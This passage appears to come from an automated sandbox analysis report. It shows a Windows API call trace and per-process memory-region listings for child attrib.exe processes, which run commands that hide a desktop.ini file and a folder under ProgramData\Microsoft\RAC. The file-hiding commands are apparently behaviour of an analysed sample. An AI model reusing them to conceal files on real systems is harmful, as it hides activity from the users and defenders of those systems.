nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cefb8*, lpNumberOfBytesWritten=0x1cdfbc*=0x20, lpOverlapped=0x0) returned 1 [0127.148] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.148] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x1cdfa8 | out: lpNewFilePointer=0x0) returned 1 [0127.148] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.148] ReadFile (in: hFile=0x54, lpBuffer=0x1cedd8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdfc8, lpOverlapped=0x0 | out: lpBuffer=0x1cedd8*, lpNumberOfBytesRead=0x1cdfc8*=0x200, lpOverlapped=0x0) returned 1 [0127.148] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.148] GetFileType (hFile=0x4c) returned 0x1 [0127.148] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.148] GetFileType (hFile=0x4c) returned 0x1 [0127.148] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.148] WriteFile (in: hFile=0x4c, lpBuffer=0x1cedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cedd8*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.148] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.148] GetFileType (hFile=0x4c) returned 0x1 [0127.148] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.148] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cee28*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.148] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.148] GetFileType (hFile=0x4c) returned 0x1 [0127.148] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.149] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cee78*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.149] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.149] GetFileType (hFile=0x4c) returned 0x1 [0127.149] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.149] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceec8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1ceec8*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, 
lpOverlapped=0x0) returned 1 [0127.149] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.149] GetFileType (hFile=0x4c) returned 0x1 [0127.149] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.149] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cef18*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.149] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.149] GetFileType (hFile=0x4c) returned 0x1 [0127.149] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.149] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cef68*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.149] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.149] GetFileType (hFile=0x4c) returned 0x1 [0127.149] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.149] WriteFile (in: hFile=0x4c, lpBuffer=0x1cefb8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cefb8*, lpNumberOfBytesWritten=0x1cdfbc*=0x20, lpOverlapped=0x0) returned 1 [0127.149] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.149] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdfa8 | out: lpNewFilePointer=0x0) returned 1 [0127.149] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.149] ReadFile (in: hFile=0x54, lpBuffer=0x1cedd8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdfc8, lpOverlapped=0x0 | out: lpBuffer=0x1cedd8*, lpNumberOfBytesRead=0x1cdfc8*=0x200, lpOverlapped=0x0) returned 1 [0127.149] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.149] GetFileType (hFile=0x4c) returned 0x1 [0127.149] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.149] GetFileType (hFile=0x4c) returned 0x1 [0127.149] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.150] WriteFile (in: hFile=0x4c, 
lpBuffer=0x1cedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cedd8*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.150] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.150] GetFileType (hFile=0x4c) returned 0x1 [0127.150] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.150] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cee28*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.150] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.150] GetFileType (hFile=0x4c) returned 0x1 [0127.150] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.150] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cee78*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.150] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.150] GetFileType (hFile=0x4c) returned 0x1 [0127.150] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.150] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceec8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1ceec8*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.150] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.150] GetFileType (hFile=0x4c) returned 0x1 [0127.150] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.150] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cef18*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.150] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.150] GetFileType (hFile=0x4c) returned 0x1 [0127.150] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.150] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef68*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cef68*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.150] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.150] GetFileType (hFile=0x4c) returned 0x1 [0127.150] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.150] WriteFile (in: hFile=0x4c, lpBuffer=0x1cefb8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cefb8*, lpNumberOfBytesWritten=0x1cdfbc*=0x20, lpOverlapped=0x0) returned 1 [0127.151] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.151] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdfa8 | out: lpNewFilePointer=0x0) returned 1 [0127.151] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.151] ReadFile (in: hFile=0x54, lpBuffer=0x1cedd8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdfc8, lpOverlapped=0x0 | out: lpBuffer=0x1cedd8*, lpNumberOfBytesRead=0x1cdfc8*=0x200, lpOverlapped=0x0) returned 1 [0127.151] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.151] GetFileType (hFile=0x4c) returned 0x1 [0127.151] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.151] GetFileType (hFile=0x4c) returned 0x1 [0127.151] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.151] WriteFile (in: hFile=0x4c, lpBuffer=0x1cedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cedd8*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.151] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.151] GetFileType (hFile=0x4c) returned 0x1 [0127.151] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.151] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cee28*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.151] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0127.151] GetFileType (hFile=0x4c) returned 0x1 [0127.151] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.151] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cee78*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.151] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.151] GetFileType (hFile=0x4c) returned 0x1 [0127.151] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.151] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceec8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1ceec8*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.151] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.151] GetFileType (hFile=0x4c) returned 0x1 [0127.151] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.151] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cef18*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.152] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.152] GetFileType (hFile=0x4c) returned 0x1 [0127.152] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.152] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cef68*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.152] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.152] GetFileType (hFile=0x4c) returned 0x1 [0127.152] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.152] WriteFile (in: hFile=0x4c, lpBuffer=0x1cefb8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cefb8*, lpNumberOfBytesWritten=0x1cdfbc*=0x20, lpOverlapped=0x0) returned 1 [0127.152] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.152] SetFilePointerEx (in: 
hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdfa8 | out: lpNewFilePointer=0x0) returned 1 [0127.152] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.152] ReadFile (in: hFile=0x54, lpBuffer=0x1cedd8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdfc8, lpOverlapped=0x0 | out: lpBuffer=0x1cedd8*, lpNumberOfBytesRead=0x1cdfc8*=0x32, lpOverlapped=0x0) returned 1 [0127.152] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.152] GetFileType (hFile=0x4c) returned 0x1 [0127.152] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.152] GetFileType (hFile=0x4c) returned 0x1 [0127.152] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.152] WriteFile (in: hFile=0x4c, lpBuffer=0x1cedd8*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cedd8*, lpNumberOfBytesWritten=0x1cdfbc*=0x32, lpOverlapped=0x0) returned 1 [0127.152] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.152] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdfa8 | out: lpNewFilePointer=0x0) returned 1 [0127.152] _close (_FileHandle=4) returned 0 [0127.152] FindNextFileW (in: hFindFile=0x300e90, lpFindFileData=0x1cf03c | out: lpFindFileData=0x1cf03c) returned 0 [0127.153] GetLastError () returned 0x12 [0127.153] FindClose (in: hFindFile=0x300e90 | out: hFindFile=0x300e90) returned 1 [0127.153] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0127.154] _close (_FileHandle=3) returned 0 [0127.154] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.154] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0127.154] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.154] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0127.154] _get_osfhandle (_FileHandle=0) returned 0x3 [0127.155] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0127.155] SetConsoleInputExeNameW () returned 0x1 
[0127.155] GetConsoleOutputCP () returned 0x1b5 [0127.155] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0127.155] SetThreadUILanguage (LangId=0x0) returned 0x409 [0127.155] exit (_Code=0) Process: id = "77" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16640" os_pid = "0xff4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "75" os_parent_pid = "0xfcc" cmd_line = "attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10145 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10146 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10147 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10148 start_va = 0x70000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 10149 start_va = 0xad0000 end_va = 0xad6fff entry_point = 0xad0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 10150 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" 
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10151 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10152 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 10153 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 10154 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 10155 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10156 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 10157 start_va = 0xb0000 end_va = 0x116fff entry_point = 0xb0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10158 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 10159 start_va = 0x370000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 10160 start_va = 0x6e2b0000 end_va = 0x6e2ccfff entry_point = 0x6e2b0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 10161 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = 
"\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10162 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 10163 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 10164 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10165 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 10166 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10167 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 10168 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 10169 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 10170 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 
region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 10171 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 10172 start_va = 0x230000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 10173 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 10174 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 134 os_tid = 0xff8 Process: id = "78" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16640" os_pid = "0xffc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "75" os_parent_pid = "0xfcc" cmd_line = "attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10291 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10292 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000000030000" filename = "" Region: id = 10293 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10294 start_va = 0x1b0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 10295 start_va = 0x8a0000 end_va = 0x8a6fff entry_point = 0x8a0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 10296 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10297 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10298 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 10299 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 10300 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 10301 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10302 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 10303 start_va = 0x80000 end_va = 0x17ffff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 10304 start_va = 0x1f0000 end_va = 
0x256fff entry_point = 0x1f0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10305 start_va = 0x3e0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 10306 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 10307 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10308 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 10309 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 10310 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10311 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 10312 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10313 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 
0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 10314 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 10315 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 10316 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 10317 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 10318 start_va = 0x260000 end_va = 0x327fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 10319 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 10320 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 135 os_tid = 0x3c4 Process: id = "79" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16780" os_pid = "0x80c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "75" os_parent_pid = "0xfcc" cmd_line = "attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\"" cur_dir = 
